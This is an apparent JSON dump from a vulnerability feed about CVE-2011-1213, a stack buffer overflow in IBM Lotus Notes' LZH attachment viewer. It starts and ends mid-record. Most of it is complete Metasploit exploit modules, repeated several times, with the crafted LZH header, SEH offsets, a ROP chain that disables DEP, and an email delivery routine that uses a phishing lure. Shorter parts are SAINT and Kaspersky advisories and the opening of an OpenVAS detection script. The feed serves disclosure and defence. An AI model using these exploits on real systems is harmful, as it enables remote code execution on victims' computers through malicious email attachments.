\nlzh[32, rop_nop.length] = rop_nop \nlzh[220, rop_gadgets.length] = rop_gadgets \nlzh[289, payload.encoded.length] = payload.encoded \nend \n \nprint_status(\"Creating '#{datastore['FILENAME']}' file...\") \nfile_create(lzh) \nend \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/102577/windows-fileformat-lotusnotes_lzh.rb.txt"}], "saint": [{"lastseen": "2019-06-04T23:19:39", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1213"], "description": "Added: 06/30/2011 \nCVE: [CVE-2011-1213](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1213>) \nBID: [48018](<http://www.securityfocus.com/bid/48018>) \nOSVDB: [72706](<http://www.osvdb.org/72706>) \n\n\n### Background\n\n[Lotus Notes](<http://www.lotus.com/notes>) is the client for Lotus Domino servers. \n\n### Problem\n\nIBM Lotus Notes File Viewer is vulnerable to remote code execution as a result of a stack buffer overflow while parsing headers of `**LZH**` files. 
A remote, unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted file to the target user and enticing them to view it with the affected software. \n\n### Resolution\n\nApply patches as described in [IBM Bulletin 1500034](<https://www-304.ibm.com/support/docview.wss?uid=swg21500034>). \n\n### References\n\n<http://secunia.com/advisories/44624/> \n\n\n### Limitations\n\nExploit works on IBM Lotus Notes 8.5 and requires a user to view the `**LZH**` attachment. A valid e-mail account must exist on the mail server and in Lotus Notes. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2011-06-30T00:00:00", "published": "2011-06-30T00:00:00", "id": "SAINT:65C4DB0D9DA3A4838F166CB775F21CD1", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/lotus_notes_lzh_viewer", "title": "IBM Lotus Notes LZH Attachment Viewer Stack Buffer Overflow", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:55", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1213"], "description": "Added: 06/30/2011 \nCVE: [CVE-2011-1213](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1213>) \nBID: [48018](<http://www.securityfocus.com/bid/48018>) \nOSVDB: [72706](<http://www.osvdb.org/72706>) \n\n\n### Background\n\n[Lotus Notes](<http://www.lotus.com/notes>) is the client for Lotus Domino servers. \n\n### Problem\n\nIBM Lotus Notes File Viewer is vulnerable to remote code execution as a result of a stack buffer overflow while parsing headers of `**LZH**` files. A remote, unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted file to the target user and enticing them to view it with the affected software. \n\n### Resolution\n\nApply patches as described in [IBM Bulletin 1500034](<https://www-304.ibm.com/support/docview.wss?uid=swg21500034>). 
\n\n### References\n\n<http://secunia.com/advisories/44624/> \n\n\n### Limitations\n\nExploit works on IBM Lotus Notes 8.5 and requires a user to view the `**LZH**` attachment. A valid e-mail account must exist on the mail server and in Lotus Notes. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2011-06-30T00:00:00", "published": "2011-06-30T00:00:00", "id": "SAINT:DA6CACC623FA712AE2036C05A990A0E7", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/lotus_notes_lzh_viewer", "type": "saint", "title": "IBM Lotus Notes LZH Attachment Viewer Stack Buffer Overflow", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T07:52:59", "description": "Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview(.lzh attachment). CVE-2011-1213. Remote exploit for windows platform", "published": "2011-06-23T00:00:00", "type": "exploitdb", "title": "Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview .lzh attachment", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1213"], "modified": "2011-06-23T00:00:00", "id": "EDB-ID:17448", "href": "https://www.exploit-db.com/exploits/17448/", "sourceData": "##\r\n# $Id: lotusnotes_lzh.rb 13015 2011-06-23 15:43:54Z bannedit $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ManualRanking # needs client interaction and permanent listener\r\n\r\n\t#\r\n\t# This module sends email messages via smtp\r\n\t#\r\n\tinclude Msf::Exploit::Remote::SMTPDeliver\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview(.lzh attachment)',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits a stack buffer overflow in Lotus Notes 8.5.2 when\r\n\t\t\t\tparsing a malformed, specially crafted LZH file. This vulnerability was\r\n\t\t\t\tdiscovered binaryhouse.net\r\n\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'binaryhouse.net',\t\t# original discovery\r\n\t\t\t\t\t'alino <26alino@gmail.com>',\t# Metasploit module\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 13015 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2011-1213'],\r\n\t\t\t\t\t['OSVDB', '72706'],\r\n\t\t\t\t\t['BID', '48018'],\r\n\t\t\t\t\t['URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=904'],\r\n\t\t\t\t\t['URL', 'http://www.ibm.com/support/docview.wss?uid=swg21500034'],\r\n\t\t\t\t],\r\n\t\t\t'Stance' => Msf::Exploit::Stance::Passive,\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Platform' => ['win'],\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Lotus Notes 8.0.x - 8.5.2 FP2 / Windows Universal',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offset' => 6741,\r\n\t\t\t\t\t\t\t'Ret' => 0x780c26b2 # POP ECX; POP ECX; RETN MSVCP60.dll\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t\r\n\t\t\t\t\t[ 'Lotus Notes 8.5.2 FP2 / Windows Universal / DEP',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offset' => 
6745,\r\n\t\t\t\t\t\t\t'Ret' => 0x60dc1043 # ADD ESP,52C; XOR EAX,EAX; POP EDI; POP ESI; POP EBX; POP EBP; RETN 4 nnotes.dll\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'May 24 2011',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\t#\r\n\t\t\t\t# Email options\r\n\t\t\t\t#\r\n\t\t\t\tOptString.new('FILENAME',\r\n\t\t\t\t\t[false, 'Sets the attachment file name', 'data.lzh']),\r\n\t\t\t\tOptString.new('MESSAGE',\r\n\t\t\t\t\t[false, 'Email message text', 'Important message, please view attachment!'])\r\n\t\t\t], self.class)\r\n\t\tregister_advanced_options(\r\n\t\t\t[\r\n\t\t\t\tOptBool.new(\"ExitOnSession\", [ false, \"Return from the exploit after a session has been created\", true ]),\r\n\t\t\t\tOptInt.new(\"ListenerTimeout\", [ false, \"The maximum number of seconds to wait for new sessions\", 0])\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\theader = \"\\x08\"\t\t# Size of archived file header <-- 8 - 13 = FFFFFFF6\r\n\t\theader << \"\\x1a\"\t\t# 1 byte Header checksum\r\n\t\theader << \"-lh0-\"\t\t# Method ID (No compression)\r\n\t\theader << \"\\x7c\\x1a\\x00\\x00\"\t# Compressed file size\r\n\t\theader << \"\\x7c\\x1a\\x00\\x00\"\t# Uncompressed file size\r\n\t\theader << \"\\xB2\\x5e\\xab\\x3c\"\t# Original file date/time\r\n\t\theader << \"\\x20\"\t\t# File attribute\r\n\t\theader << \"\\x00\"\t\t# Level identifier\r\n\t\theader << \"\\x07\"\t\t# File name length\r\n\t\theader << \"poc.txt\"\t\t# File name\r\n\t\theader << \"\\x25\\x7d\"\t\t# 16 bit CRC of the uncompressed file\r\n\r\n\t\tlzh = header \r\n\t\tlzh << rand_text(target['Offset'])\r\n\r\n\t\tif (target == targets[0])\r\n\r\n\t\t\tlzh << generate_seh_record(target.ret)\r\n\t\t\tlzh << make_nops(8)\r\n\t\t\tlzh << payload.encoded\r\n\r\n\t\telsif (target == targets[1])\r\n\r\n\t\t\trop_nop = [0x7c3c5958].pack('V') * 47 # RETN MSVCP71.dll\r\n\r\n\t\t\trop_gadgets =\r\n\t\t\t[\r\n\t\t\t\t0x60524404, # POP EAX; 
RETN nnotes.dll\r\n\t\t\t\t0x7c37a140, # VirtualProtect() \r\n\t\t\t\t0x7c3a4000, # MOV EAX,DWORD PTR DS:[EAX]; RETN MSVCP71.dll\r\n\t\t\t\t0x603c53c1, # MOV ESI,EAX; RETN nnotes.dll\r\n\t\t\t\t0x60620001, # POP EBP; RETN nnotes.dll\r\n\t\t\t\t0x7c3c5946, # PUSH ESP; RETN MSVCP71.dll\r\n\t\t\t\t0x7c34280f, # POP EBX; RETN MSVCR71.dll\r\n\t\t\t\t0x00001954, # dwSize\r\n\t\t\t\t0x780ea001, # POP ECX; RETN MSVCP60.dll\r\n\t\t\t\t0x7c38b000, # lpflOldProtect\r\n\t\t\t\t0x60e73200, # POP EDI; RETN nnotes.dll\r\n\t\t\t\t0x60e73201, # RETN nnotes.dll\r\n\t\t\t\t0x601d5f02, # POP EDX; RETN nnotes.dll\r\n\t\t\t\t0x00000040, # flNewProtect\r\n\t\t\t\t0x60524404, # POP EAX; RETN nnotes.dll\r\n\t\t\t\t0x90909090, # NOP\r\n\t\t\t\t0x60820801, # PUSHAD; RETN nnotes.dll\r\n\t\t\t].pack(\"V*\")\r\n\r\n\t\t\tlzh << [target.ret].pack('V')\r\n\t\t\tlzh[32, rop_nop.length] = rop_nop\r\n\t\t\tlzh[220, rop_gadgets.length] = rop_gadgets\r\n\t\t\tlzh[289, payload.encoded.length] = payload.encoded\r\n\t\tend\r\n\r\n\t\tname = datastore['FILENAME'] || Rex::Text.rand_text_alpha(rand(10)+1) + \".lzh\"\r\n\t\tdata = datastore['MESSAGE'] || Rex::Text.rand_text_alpha(rand(32)+1)\r\n\r\n\t\tmsg = Rex::MIME::Message.new\r\n\t\tmsg.mime_defaults\r\n\t\tmsg.subject = datastore['SUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1)\r\n\t\tmsg.to = datastore['MAILTO']\r\n\t\tmsg.from = datastore['MAILFROM']\r\n\r\n\t\tmsg.add_part(Rex::Text.encode_base64(data, \"\\r\\n\"), \"text/plain\", \"base64\", \"inline\")\r\n\t\tmsg.add_part_attachment(lzh, name)\r\n\r\n\t\tsend_message(msg.to_s)\r\n\r\n\t\tprint_status(\"Waiting for a payload session (backgrounding)...\")\r\n\r\n\t\tif not datastore['ExitOnSession'] and not job_id\r\n\t\t\traise RuntimeError, \"Setting ExitOnSession to false requires running as a job (exploit -j)\"\r\n\t\tend\r\n\r\n\t\tstime = Time.now.to_f\r\n\t\tprint_status \"Starting the payload handler...\"\r\n\t\twhile(true)\r\n\t\t\tbreak if session_created? 
and datastore['ExitOnSession']\r\n\t\t\tbreak if ( datastore['ListenerTimeout'].to_i > 0 and (stime + datastore['ListenerTimeout'].to_i < Time.now.to_f) )\r\n\r\n\t\t\tselect(nil,nil,nil,1)\r\n\t\tend\r\n\tend\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/17448/"}], "metasploit": [{"lastseen": "2020-10-06T01:00:24", "description": "This module exploits a stack buffer overflow in Lotus Notes 8.5.2 when parsing a malformed, specially crafted LZH file. This vulnerability was discovered binaryhouse.net\n", "published": "2011-06-23T09:51:16", "type": "metasploit", "title": "Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment)", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1213"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/LOTUS/LOTUSNOTES_LZH", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking # needs client interaction and permanent listener\n\n #\n # This module sends email messages via smtp\n #\n include Msf::Exploit::Remote::SMTPDeliver\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment)',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Lotus Notes 8.5.2 when\n parsing a malformed, specially crafted LZH file. 
This vulnerability was\n discovered binaryhouse.net\n\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'binaryhouse.net', # original discovery\n 'alino <26alino[at]gmail.com>', # Metasploit module\n ],\n 'References' =>\n [\n ['CVE', '2011-1213'],\n ['OSVDB', '72706'],\n ['BID', '48018'],\n ['URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=904'],\n ['URL', 'http://www.ibm.com/support/docview.wss?uid=swg21500034'],\n ],\n 'Stance' => Msf::Exploit::Stance::Passive,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Platform' => ['win'],\n 'Targets' =>\n [\n [ 'Lotus Notes 8.0.x - 8.5.2 FP2 / Windows Universal',\n {\n 'Offset' => 6741,\n 'Ret' => 0x780c26b2 # POP ECX; POP ECX; RETN MSVCP60.dll\n }\n ],\n\n [ 'Lotus Notes 8.5.2 FP2 / Windows Universal / DEP',\n {\n 'Offset' => 6745,\n 'Ret' => 0x60dc1043 # ADD ESP,52C; XOR EAX,EAX; POP EDI; POP ESI; POP EBX; POP EBP; RETN 4 nnotes.dll\n }\n ],\n ],\n 'DisclosureDate' => 'May 24 2011',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n #\n # Email options\n #\n OptString.new('FILENAME',\n [false, 'Sets the attachment file name', 'data.lzh']),\n OptString.new('MESSAGE',\n [false, 'Email message text', 'Important message, please view attachment!'])\n ])\n register_advanced_options(\n [\n OptBool.new(\"ExitOnSession\", [ false, \"Return from the exploit after a session has been created\", true ]),\n OptInt.new(\"ListenerTimeout\", [ false, \"The maximum number of seconds to wait for new sessions\", 0])\n ])\n end\n\n def exploit\n\n header = \"\\x08\"\t\t# Size of archived file header <-- 8 - 13 = FFFFFFF6\n header << \"\\x1a\"\t\t# 1 byte Header checksum\n header << \"-lh0-\"\t\t# Method ID (No compression)\n header << \"\\x7c\\x1a\\x00\\x00\"\t# Compressed file size\n header << \"\\x7c\\x1a\\x00\\x00\"\t# Uncompressed file size\n header << \"\\xB2\\x5e\\xab\\x3c\"\t# Original file date/time\n header << \"\\x20\"\t\t# File attribute\n header << \"\\x00\"\t\t# Level identifier\n 
header << \"\\x07\"\t\t# File name length\n header << \"poc.txt\"\t\t# File name\n header << \"\\x25\\x7d\"\t\t# 16 bit CRC of the uncompressed file\n\n lzh = header\n lzh << rand_text(target['Offset'])\n\n if (target == targets[0])\n\n lzh << generate_seh_record(target.ret)\n lzh << make_nops(8)\n lzh << payload.encoded\n\n elsif (target == targets[1])\n\n rop_nop = [0x7c3c5958].pack('V') * 47 # RETN MSVCP71.dll\n\n rop_gadgets =\n [\n 0x60524404, # POP EAX; RETN nnotes.dll\n 0x7c37a140, # VirtualProtect()\n 0x7c3a4000, # MOV EAX,DWORD PTR DS:[EAX]; RETN MSVCP71.dll\n 0x603c53c1, # MOV ESI,EAX; RETN nnotes.dll\n 0x60620001, # POP EBP; RETN nnotes.dll\n 0x7c3c5946, # PUSH ESP; RETN MSVCP71.dll\n 0x7c34280f, # POP EBX; RETN MSVCR71.dll\n 0x00001954, # dwSize\n 0x780ea001, # POP ECX; RETN MSVCP60.dll\n 0x7c38b000, # lpflOldProtect\n 0x60e73200, # POP EDI; RETN nnotes.dll\n 0x60e73201, # RETN nnotes.dll\n 0x601d5f02, # POP EDX; RETN nnotes.dll\n 0x00000040, # flNewProtect\n 0x60524404, # POP EAX; RETN nnotes.dll\n 0x90909090, # NOP\n 0x60820801, # PUSHAD; RETN nnotes.dll\n ].pack(\"V*\")\n\n lzh << [target.ret].pack('V')\n lzh[32, rop_nop.length] = rop_nop\n lzh[220, rop_gadgets.length] = rop_gadgets\n lzh[289, payload.encoded.length] = payload.encoded\n end\n\n name = datastore['FILENAME'] || Rex::Text.rand_text_alpha(rand(10)+1) + \".lzh\"\n data = datastore['MESSAGE'] || Rex::Text.rand_text_alpha(rand(32)+1)\n\n msg = Rex::MIME::Message.new\n msg.mime_defaults\n msg.subject = datastore['SUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1)\n msg.to = datastore['MAILTO']\n msg.from = datastore['MAILFROM']\n\n msg.add_part(Rex::Text.encode_base64(data, \"\\r\\n\"), \"text/plain\", \"base64\", \"inline\")\n msg.add_part_attachment(lzh, name)\n\n send_message(msg.to_s)\n\n print_status(\"Waiting for a payload session (backgrounding)...\")\n\n if not datastore['ExitOnSession'] and not job_id\n fail_with(Failure::Unknown, \"Setting ExitOnSession to false requires running as 
a job (exploit -j)\")\n end\n\n stime = Time.now.to_f\n print_status \"Starting the payload handler...\"\n while(true)\n break if session_created? and datastore['ExitOnSession']\n break if ( datastore['ListenerTimeout'].to_i > 0 and (stime + datastore['ListenerTimeout'].to_i < Time.now.to_f) )\n\n select(nil,nil,nil,1)\n end\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/lotus/lotusnotes_lzh.rb"}, {"lastseen": "2020-06-18T22:36:51", "description": "This module exploits a stack buffer overflow in Lotus Notes 8.5.2 when parsing a malformed, specially crafted LZH file. This vulnerability was discovered binaryhouse.net\n", "published": "2011-06-23T15:43:54", "type": "metasploit", "title": "Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment)", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1213"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/LOTUSNOTES_LZH", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment)',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Lotus Notes 8.5.2 when\n parsing a malformed, specially crafted LZH file. 
This vulnerability was\n discovered binaryhouse.net\n\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'binaryhouse.net',\t\t# original discovery\n 'alino <26alino[at]gmail.com>',\t# Metasploit module\n ],\n 'References' =>\n [\n ['CVE', '2011-1213'],\n ['OSVDB', '72706'],\n ['BID', '48018'],\n ['URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=904'],\n ['URL', 'http://www.ibm.com/support/docview.wss?uid=swg21500034'],\n ],\n 'Stance' => Msf::Exploit::Stance::Passive,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Platform' => ['win'],\n 'Targets' =>\n [\n [ 'Lotus Notes 8.0.x - 8.5.2 FP2 / Windows Universal',\n {\n 'Offset' => 6741,\n 'Ret' => 0x780c26b2 # POP ECX; POP ECX; RETN MSVCP60.dll\n }\n ],\n\n [ 'Lotus Notes 8.5.2 FP2 / Windows Universal / DEP',\n {\n 'Offset' => 6745,\n 'Ret' => 0x60dc1043 # ADD ESP,52C; XOR EAX,EAX; POP EDI; POP ESI; POP EBX; POP EBP; RETN 4 nnotes.dll\n }\n ],\n ],\n 'DisclosureDate' => 'May 24 2011',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ true, 'The file name.', 'msf.lzh']),\n ])\n end\n\n def exploit\n\n header = \"\\x08\"\t\t# Size of archived file header <-- 8 - 13 = FFFFFFF6\n header << \"\\x1a\"\t\t# 1 byte Header checksum\n header << \"-lh0-\"\t\t# Method ID (No compression)\n header << \"\\x7c\\x1a\\x00\\x00\"\t# Compressed file size\n header << \"\\x7c\\x1a\\x00\\x00\"\t# Uncompressed file size\n header << \"\\xB2\\x5e\\xab\\x3c\"\t# Original file date/time\n header << \"\\x20\"\t\t# File attribute\n header << \"\\x00\"\t\t# Level identifier\n header << \"\\x07\"\t\t# File name length\n header << \"poc.txt\"\t\t# File name\n header << \"\\x25\\x7d\"\t\t# 16 bit CRC of the uncompressed file\n\n lzh = header\n lzh << rand_text(target['Offset'])\n\n if (target == targets[0])\n\n lzh << generate_seh_record(target.ret)\n lzh << make_nops(8)\n lzh << payload.encoded\n\n elsif (target == targets[1])\n\n rop_nop = [0x7c3c5958].pack('V') * 47 # RETN 
MSVCP71.dll\n\n rop_gadgets =\n [\n 0x60524404, # POP EAX; RETN nnotes.dll\n 0x7c37a140, # VirtualProtect()\n 0x7c3a4000, # MOV EAX,DWORD PTR DS:[EAX]; RETN MSVCP71.dll\n 0x603c53c1, # MOV ESI,EAX; RETN nnotes.dll\n 0x60620001, # POP EBP; RETN nnotes.dll\n 0x7c3c5946, # PUSH ESP; RETN MSVCP71.dll\n 0x7c34280f, # POP EBX; RETN MSVCR71.dll\n 0x00001954, # dwSize\n 0x780ea001, # POP ECX; RETN MSVCP60.dll\n 0x7c38b000, # lpflOldProtect\n 0x60e73200, # POP EDI; RETN nnotes.dll\n 0x60e73201, # RETN nnotes.dll\n 0x601d5f02, # POP EDX; RETN nnotes.dll\n 0x00000040, # flNewProtect\n 0x60524404, # POP EAX; RETN nnotes.dll\n 0x90909090, # NOP\n 0x60820801, # PUSHAD; RETN nnotes.dll\n ].pack(\"V*\")\n\n lzh << [target.ret].pack('V')\n lzh[32, rop_nop.length] = rop_nop\n lzh[220, rop_gadgets.length] = rop_gadgets\n lzh[289, payload.encoded.length] = payload.encoded\n end\n\n print_status(\"Creating '#{datastore['FILENAME']}' file...\")\n file_create(lzh)\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/lotusnotes_lzh.rb"}], "kaspersky": [{"lastseen": "2020-09-02T11:58:31", "bulletinFamily": "info", "cvelist": ["CVE-2011-1217", "CVE-2011-1214", "CVE-2011-1218", "CVE-2011-1512", "CVE-2011-1216", "CVE-2011-1213"], "description": "### *Detect date*:\n05/31/2011\n\n### *Severity*:\nCritical\n\n### *Description*:\nAn unspecified vulnerability was found in IBM products. By exploiting this vulnerability malicious users can execute arbitrary code. This vulnerability can be exploited remotely at a point related to gcc keys. 
Below is a complete list of vulnerabilities\n\n### *Affected products*:\nIBM Lotus Notes versions 8.5.2.2 and earlier\n\n### *Solution*:\nUpdate to latest version\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[IBM Notes](<https://threats.kaspersky.com/en/product/IBM-Notes/>)\n\n### *CVE-IDS*:\n[CVE-2011-1213](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1213>)9.3Critical \n[CVE-2011-1217](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1217>)9.3Critical \n[CVE-2011-1218](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1218>)9.3Critical \n[CVE-2011-1214](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1214>)9.3Critical \n[CVE-2011-1216](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1216>)9.3Critical \n[CVE-2011-1512](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1512>)9.3Critical", "edition": 41, "modified": "2020-05-22T00:00:00", "published": "2011-05-31T00:00:00", "id": "KLA10202", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10202", "title": "\r KLA10202ACE vulnerabilities in IBM Lotus Notes ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-04-27T19:22:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1215", "CVE-2011-1217", "CVE-2011-1214", "CVE-2011-1218", "CVE-2011-1512", "CVE-2011-1216", "CVE-2011-1213"], "description": "This host has IBM Lotus Notes installed and is prone to multiple\n buffer overflow vulnerabilities.", "modified": "2020-04-23T00:00:00", "published": "2011-06-07T00:00:00", "id": "OPENVAS:1361412562310801945", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801945", "type": "openvas", "title": "IBM Lotus Notes File Viewers Multiple BOF Vulnerabilities (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# IBM Lotus Notes File Viewers Multiple BOF Vulnerabilities (Windows)\n#\n# 
Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801945\");\n script_version(\"2020-04-23T08:43:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-23 08:43:39 +0000 (Thu, 23 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-06-07 13:29:28 +0200 (Tue, 07 Jun 2011)\");\n script_cve_id(\"CVE-2011-1213\", \"CVE-2011-1214\", \"CVE-2011-1215\", \"CVE-2011-1216\",\n \"CVE-2011-1217\", \"CVE-2011-1218\", \"CVE-2011-1512\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"IBM Lotus Notes File Viewers Multiple BOF Vulnerabilities (Windows)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/44624\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/67621\");\n script_xref(name:\"URL\", value:\"https://www-304.ibm.com/support/docview.wss?uid=swg21500034\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"Buffer overflow\");\n 
script_dependencies(\"secpod_ibm_lotus_notes_detect_win.nasl\");\n script_mandatory_keys(\"IBM/LotusNotes/Win/Ver\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to execute arbitrary code in the\n context of the user running the application.\");\n script_tag(name:\"affected\", value:\"IBM Lotus Notes Version 8.5.2 FP2 and prior on windows\");\n script_tag(name:\"insight\", value:\"The flaws are due to:\n\n - An error within 'xlssr.dll' when parsing a Binary File Format (BIFF)\n record in an Excel spreadsheet.\n\n - An integer underflow error within 'lzhsr.dll' when parsing header\n information in a LZH archive file.\n\n - A boundary error within 'rtfsr.dll' when parsing hyperlink information\n in a Rich Text Format (RTF) document.\n\n - A boundary error within 'mw8sr.dll' when parsing hyperlink information\n in a Microsoft Office Document (DOC) file.\n\n - A boundary error within 'assr.dll' when parsing tag information in an\n Applix Spreadsheet.\n\n - An unspecified error within 'kpprzrdr.dll' when parsing Lotus Notes .prz\n file format.\n\n - An unspecified error within 'kvarcve.dll' when parsing Lotus Notes .zip\n file format.\");\n script_tag(name:\"solution\", value:\"Upgrade to IBM Lotus Notes 8.5.2 FP3\");\n script_tag(name:\"summary\", value:\"This host has IBM Lotus Notes installed and is prone to multiple\n buffer overflow vulnerabilities.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://www.ibm.com/software/lotus/products/notes/\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nlotusVer = get_kb_item(\"IBM/LotusNotes/Win/Ver\");\nif(!lotusVer){\n exit(0);\n}\n\n## Match main version and ignore the build version\nversion = eregmatch(pattern:\"(([0-9]+\\.[0-9]+\\.[0-9]+).?([0-9]+)?)\", string: lotusVer);\nif(version[1] != NULL)\n{\n 